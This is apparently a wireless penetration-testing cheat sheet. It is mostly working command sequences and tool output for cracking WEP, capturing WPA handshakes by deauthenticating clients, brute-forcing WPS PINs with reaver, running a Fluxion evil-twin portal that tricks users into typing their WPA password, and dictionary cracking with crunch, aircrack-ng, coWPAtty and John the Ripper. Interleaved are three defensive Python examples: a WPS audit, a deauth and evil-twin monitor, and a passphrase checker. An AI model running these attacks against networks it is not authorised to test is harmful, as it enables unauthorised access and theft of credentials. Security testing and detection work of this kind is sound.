Pentest Wireless Hacking
I personally use either of two items that I carry around in my hacker's tool belt.
ALFA Network card AWUS036NH - 802.11 b/g/n Long-Range, approx £30 / $50
TP-LINK TL-WN722N - 150 Mbps, high-gain, approx £12 / $20
WEP (fake authentication + ARP request replay):
airmon-ng stop wlan0
ifconfig wlan0 down
macchanger --mac aa:bb:cc:dd:ee:ff wlan0
airmon-ng start wlan0
Scan for networks:
airodump-ng -c (channel) -w (file name) --bssid (bssid) mon0
aireplay-ng -1 0 -a (bssid) -h aa:bb:cc:dd:ee:ff -e (essid) wlan0
aireplay-ng -3 -b (bssid) -h aa:bb:cc:dd:ee:ff wlan0
(the #Data column in airodump-ng, i.e. captured IVs, will have to be above 10,000 before the key can be cracked)
aircrack-ng -b (bssid) (file_name-01.cap)
WPA/WPA2 (handshake capture + dictionary attack):
ifconfig wlan0 down
airmon-ng stop wlan0
macchanger --mac=aa:bb:cc:dd:ee:ff wlan0
airmon-ng start wlan0
(the monitor-mode interface is called mon0 on older aircrack-ng releases and wlan0mon on current ones; use whichever name airmon-ng reports in the commands below)
Scan for networks:
Choose your target and then:
airodump-ng --channel 6 wlan0 -w Desktop/CapFileName
Attack using AP MAC and Client MAC:
aireplay-ng -0 10 -a 00:1D:AA:30:6A:F9 mon0 --ignore-negative-one
aircrack-ng -w ~/Desktop/Wordlist/CRACKED_PASS.dic /root/Desktop/CapFileName-01.cap
(airodump-ng appends -01 and the .cap extension to the name given with -w, so the capture file is CapFileName-01.cap)
$ wash -i mon0

Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <firstname.lastname@example.org>

BSSID              Channel  RSSI  WPS Version  WPS Locked  ESSID
---------------------------------------------------------------------------
7C:4C:A5:77:52:B9  1        00    1.0          No          SKYDFA47
E4:F4:C6:79:99:20  6        00    1.0          Yes         leonteale-2Ghz

$ reaver -i mon0 -b E4:F4:C6:79:99:20 -c 6 -f -e leonteale-2Ghz -a -S -vv

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <email@example.com>

[+] Switching mon0 to channel 6
[+] Waiting for beacon from E4:F4:C6:79:99:20
[+] Associated with E4:F4:C6:79:99:20 (ESSID: leonteale-2Ghz)
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking

The WPS Locked column and reaver's rate-limiting warnings describe the same state: the AP has stopped accepting PIN attempts for a while. Lockout only slows the PIN attack down; disabling WPS on the AP removes it.
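The wash table above is easy to parse, which makes it useful on the defending side: run it against your own site and confirm that none of the access points you manage still advertise WPS, and check whether any of them has already gone into the locked state that reaver reports as rate limiting. The script below is an added example written for this page, not part of wash or reaver; the sample output and its BSSIDs are constructed, and the list of managed BSSIDs is an assumption you replace with your own inventory.

```python
"""
WPS exposure audit built on the wash table format shown above.
Added example, not part of wash or reaver; sample output is constructed.
"""
import re
from dataclasses import dataclass

# Constructed wash output in the same layout as the real tool's table.
SAMPLE_WASH = """\
Wash v1.4 WiFi Protected Setup Scan Tool

BSSID              Channel  RSSI  WPS Version  WPS Locked  ESSID
---------------------------------------------------------------------------
02:00:00:00:00:0A  1        00    1.0          No          guest-net
02:00:00:00:00:0B  6        -61   1.0          Yes         corp-wifi
02:00:00:00:00:0C  11       -70   2.0          No          neighbour
"""

ROW = re.compile(
    r"^(?P<bssid>(?:[0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2})\s+(?P<channel>\d+)\s+"
    r"(?P<rssi>-?\d+)\s+(?P<version>\S+)\s+(?P<locked>Yes|No)\s+(?P<essid>.*)$"
)


@dataclass
class WpsAp:
    bssid: str
    channel: int
    rssi: int
    version: str
    locked: bool
    essid: str


def parse_wash(text):
    """Parse the table rows; banner and header lines do not match and are skipped.
    Every row wash prints is an AP that advertises WPS in its beacons."""
    aps = []
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if m:
            aps.append(WpsAp(m["bssid"].upper(), int(m["channel"]), int(m["rssi"]),
                             m["version"], m["locked"] == "Yes", m["essid"].strip()))
    return aps


def audit(aps, managed_bssids):
    """Findings for the APs you manage only; other people's APs are not yours to fix."""
    managed = {b.upper() for b in managed_bssids}
    findings = []
    for ap in aps:
        if ap.bssid not in managed:
            continue
        findings.append(f"{ap.bssid} ({ap.essid}): WPS {ap.version} advertised; disable WPS on this AP")
        if ap.locked:
            findings.append(f"{ap.bssid} ({ap.essid}): WPS locked, the AP is refusing PIN attempts; "
                            "check its logs for a brute-force attempt")
    return findings


if __name__ == "__main__":
    # Assumed inventory of managed APs (constructed, locally administered MACs).
    for finding in audit(parse_wash(SAMPLE_WASH), {"02:00:00:00:00:0a", "02:00:00:00:00:0b"}):
        print(finding)
```

Feed it real output with `wash -i mon0 | python wps_audit.py`-style piping by replacing `SAMPLE_WASH` with `sys.stdin.read()`; the row regex is deliberately anchored on the MAC address so the banner and copyright lines never produce false rows.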
Fluxion is a remake of linset by vk496 with (hopefully) fewer bugs and more functionality. It's compatible with the latest release of Kali (rolling). If you're new, or just don't understand much about the project, have a look at the wiki. The attack is mostly manual, but experimental versions will automatically handle most functionality from the stable releases.
git clone https://github.com/deltaxflux/fluxion
How it works
* Scan the networks.
* Capture a handshake (can't be used without a valid handshake; it's necessary to verify the password).
* Use the web interface.
* Launch a FakeAP instance to imitate the original access point.
* Spawn an MDK3 process, which deauthenticates all users connected to the target network, so they can be lured to connect to the FakeAP and enter the WPA password.
* A fake DNS server is launched in order to capture all DNS requests and redirect them to the host running the script.
* A captive portal is launched in order to serve a page which prompts the user to enter their WPA password.
* Each submitted password is verified against the handshake captured earlier.
* The attack will automatically terminate as soon as a correct password is submitted.
A Linux-based operating system. We recommend Kali Linux 2 or Kali 2016.1 rolling. Kali 2 & 2016 support the latest aircrack-ng versions. An external wifi card is recommended.
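Both the aireplay-ng -0 step in the WPA section and Fluxion's MDK3/FakeAP stage leave a clear trace on the air: a burst of deauthentication frames carrying the real AP's BSSID, followed (for the evil twin) by beacons for your ESSID from a BSSID you do not own, usually with the privacy bit cleared. The monitor below is an added example for this page, not code from aircrack-ng or Fluxion; it parses raw 802.11 management frames, and the frames, the known-AP list and the thresholds are constructed assumptions you would tune for your own site.

```python
"""
Defender-side monitor for deauth floods and evil-twin beacons.
Added example, not part of aircrack-ng or Fluxion; demo traffic is constructed.
"""
import struct
from collections import defaultdict

TYPE_MGMT = 0
SUBTYPE_BEACON = 0x8
SUBTYPE_DEAUTH = 0xC
CAP_PRIVACY = 0x0010          # capability bit: network uses encryption
DEAUTH_THRESHOLD = 5          # deauth frames per BSSID ...
WINDOW_SECONDS = 1.0          # ... within this sliding window (assumed tuning)


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def parse_mgmt(frame):
    """Split a management frame into (subtype, addr1, addr2, bssid, body); None for other types."""
    if len(frame) < 24:
        return None
    fc = frame[0]                                   # frame control, first octet
    if (fc >> 2) & 0x3 != TYPE_MGMT:
        return None
    subtype = (fc >> 4) & 0xF
    return (subtype, mac_str(frame[4:10]), mac_str(frame[10:16]),
            mac_str(frame[16:22]), frame[24:])


def beacon_info(body):
    """Beacon body = timestamp(8) + interval(2) + capability(2) + tagged IEs. Returns (ssid, privacy)."""
    if len(body) < 12:
        return None
    cap = struct.unpack_from("<H", body, 10)[0]
    ssid, pos = None, 12
    while pos + 2 <= len(body):
        tag, length = body[pos], body[pos + 1]
        if tag == 0:                                # element ID 0 = SSID
            ssid = body[pos + 2:pos + 2 + length].decode("utf-8", "replace")
        pos += 2 + length
    return ssid, bool(cap & CAP_PRIVACY)


def analyze(frames, known_aps):
    """frames: iterable of (timestamp, bytes); known_aps: {ssid: set of bssid}. Returns alert strings."""
    alerts, deauth_times = [], defaultdict(list)
    flooded, rogue = set(), set()
    for ts, raw in frames:
        parsed = parse_mgmt(raw)
        if parsed is None:
            continue
        subtype, dst, src, bssid, body = parsed
        if subtype == SUBTYPE_DEAUTH:
            times = deauth_times[bssid]
            times.append(ts)
            while ts - times[0] > WINDOW_SECONDS:   # slide the window
                times.pop(0)
            if len(times) >= DEAUTH_THRESHOLD and bssid not in flooded:
                flooded.add(bssid)
                alerts.append(f"deauth flood: {len(times)} deauths claiming {bssid} "
                              f"within {WINDOW_SECONDS}s (to {dst})")
        elif subtype == SUBTYPE_BEACON:
            info = beacon_info(body)
            if info is None or info[0] not in known_aps:
                continue
            ssid, privacy = info
            if bssid not in known_aps[ssid] and (ssid, bssid) not in rogue:
                rogue.add((ssid, bssid))
                alerts.append(f"evil twin: '{ssid}' beaconed by unknown {bssid} "
                              f"({'encrypted' if privacy else 'OPEN'})")
    return alerts


# --- constructed demo traffic (not a real capture) -------------------------
def build_mgmt(subtype, addr1, addr2, bssid, body=b""):
    fc = bytes([(subtype << 4) | (TYPE_MGMT << 2), 0x00])
    return fc + b"\x00\x00" + addr1 + addr2 + bssid + b"\x00\x00" + body


def build_beacon_body(ssid, privacy):
    cap = 0x0001 | (CAP_PRIVACY if privacy else 0)  # ESS bit plus optional privacy bit
    return struct.pack("<QHH", 0, 100, cap) + bytes([0, len(ssid)]) + ssid.encode()


REAL_AP = bytes.fromhex("020000000001")             # constructed locally administered MACs
ROGUE_AP = bytes.fromhex("020000000099")
BROADCAST = b"\xff" * 6
KNOWN_APS = {"corp-wifi": {mac_str(REAL_AP)}}      # assumed inventory of your own APs

SAMPLE_FRAMES = [(0.0, build_mgmt(SUBTYPE_BEACON, BROADCAST, REAL_AP, REAL_AP,
                                  build_beacon_body("corp-wifi", True)))]
SAMPLE_FRAMES += [(0.1 * i, build_mgmt(SUBTYPE_DEAUTH, BROADCAST, REAL_AP, REAL_AP, b"\x07\x00"))
                  for i in range(1, 7)]
SAMPLE_FRAMES.append((1.0, build_mgmt(SUBTYPE_BEACON, BROADCAST, ROGUE_AP, ROGUE_AP,
                                      build_beacon_body("corp-wifi", False))))

if __name__ == "__main__":
    for alert in analyze(SAMPLE_FRAMES, KNOWN_APS):
        print(alert)
```

On a real sensor the `(timestamp, bytes)` pairs would come from a monitor-mode capture with the radiotap header stripped; the two alerts this demo raises are the deauth burst that precedes both attacks and the open-network twin of a network that is supposed to be encrypted, which is exactly the pair of signals a wireless IDS keys on.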
crunch 8 8 1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ -t 97KQA@@@ | aircrack-ng -b 78:54:2E:28:E7:86 -w - thehak-01.cap
(crunch streams candidates straight into aircrack-ng, which reads the wordlist from stdin with -w -; the -t pattern keeps the literal 97KQA prefix and fills each @ position from the supplied character set, so only the last three characters vary)
Passgen is a simple Python alternative to the random character generator Crunch which attempts to speed up cracking WPA/WPA2 keys by randomizing the output instead of generating the list in order (aaaaaaaa, aaaaaaab, aaaaaaac, etc.).
Example usage with aircrack-ng:
python passgen.py -l | sudo aircrack-ng --bssid 00:11:22:33:44:55 -w- WiFi.cap
Some other options are:
* The Associative Word List Generator (AWLG) – Wordlists for Password Cracking
* CeWL – Custom Word List Generator Tool for Password Cracking
* RSMangler – Keyword Based Wordlist Generator For Bruteforcing
* CUPP – Common User Passwords Profiler – Automated Password Profiling Tool
Of course John the Ripper (JTR) has some built-in options for creating permutations from wordlists.
$ ./cowpatty -r eap-test.dump -f dict -s somethingclever
coWPAtty 2.0 - WPA-PSK dictionary attack. <firstname.lastname@example.org>

Collected all necessary data to mount crack against passphrase.
Loading words into memory, please be patient ... Done (10201 words).
Starting dictionary attack. Please be patient.

The PSK is "family movie night".

4087 passphrases tested in 59.05 seconds: 69.22 passphrases/second
This tool can also accept dictionary words from STDIN, allowing us to utilize a tool such as John the Ripper to create lots of word permutations from a dictionary file:
$ john -wordfile:dictfile -rules -session:johnrestore.dat -stdout:63 | cowpatty -r eap-test.dump -f - -s somethingclever
In the default configuration of John the Ripper, common permutations of dictionary words will be sent as potential passwords to coWPAtty. For example, here is a list of the words John will create from the input word "password":
$ echo password >word
$ john -session:/tmp/delme -wordfile:word -rules -stdout
password
Password
passwords
password1
Password1
drowssap
1password
PASSWORD
password2
password!
password3
password7
password9
password5
password4
password8
password6
password0
password.
password?
psswrd
drowssaP
Drowssap
passworD
2password
4password
Password2
Password!
Password3
Password9
Password5
Password7
Password4
Password6
Password8
Password.
Password?
Password0
3password
7password
9password
5password
6password
8password
Passwords
passworded
passwording
Passworded
Passwording
words: 49  time: 0:00:00:00 100%  w/s: 49.00  current: Passwording
John the Ripper is available at http://www.openwall.com/john/
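The 49 permutations above are the other side of the coin for anyone choosing a WPA/WPA2 passphrase: a dictionary word with its case changed, reversed, or decorated with a digit or two is only one rule away from the bare word, and the coWPAtty run above shows that a three-word phrase from a small list falls in under a minute. The check below is an added example for this page, not code from John the Ripper or coWPAtty; it mirrors the rule families visible in that output (case, reversal, short digit/punctuation affixes, plural and -ed/-ing forms, multi-word phrases), and the dictionary it uses is a constructed stand-in for a real word list.

```python
"""
Weak-passphrase check for your own WPA/WPA2 networks.
Added example, not part of John the Ripper or coWPAtty; dictionary is constructed.
"""
import re

# Constructed mini dictionary; in practice use the same large word lists an attacker would.
DICTIONARY = {"password", "family", "movie", "night", "welcome", "dragon"}

# Up to two digits / punctuation characters at either end are treated as decoration.
AFFIX = re.compile(r"^[0-9!?.]{0,2}(.*?)[0-9!?.]{0,2}$")


def base_candidates(passphrase):
    """Yield the base words that default mangling rules could have started from."""
    core = AFFIX.match(passphrase).group(1)
    for form in (passphrase, core):
        low = form.lower()
        yield low                      # case-only change (Password, PASSWORD, passworD)
        yield low[::-1]                # reversed word (drowssap)
        for suffix in ("s", "ed", "ing"):
            if low.endswith(suffix):   # passwords, passworded, passwording
                yield low[: -len(suffix)]


def is_trivially_derived(passphrase, dictionary=DICTIONARY):
    return any(c in dictionary for c in base_candidates(passphrase))


def check_wpa_passphrase(passphrase, dictionary=DICTIONARY):
    """Return (ok, reason). WPA-PSK passphrases are 8 to 63 printable ASCII characters."""
    if not 8 <= len(passphrase) <= 63 or not all(32 <= ord(ch) < 127 for ch in passphrase):
        return False, "not a valid WPA-PSK passphrase (8-63 printable ASCII characters)"
    if is_trivially_derived(passphrase, dictionary):
        return False, "dictionary word with a trivial mangling; default john rules would produce it"
    words = re.split(r"[ _-]+", passphrase.lower())
    if len(words) > 1 and all(w in dictionary for w in words):
        return False, f"phrase of {len(words)} dictionary words; a phrase list would hit it"
    return True, "no trivial derivation from the dictionary found"


if __name__ == "__main__":
    for p in ("Password1", "drowssaP", "family movie night", "xq7-Lm9v-Kp2z"):
        print(p, check_wpa_passphrase(p))
```

The check is deliberately conservative: it only says a passphrase is weak when it can name the rule that reaches it, so a pass result means "not trivially derived from this dictionary", not "strong". Pair it with a length floor of 16 or more characters, or with WPA3-SAE where the hardware supports it, rather than relying on mangling resistance alone.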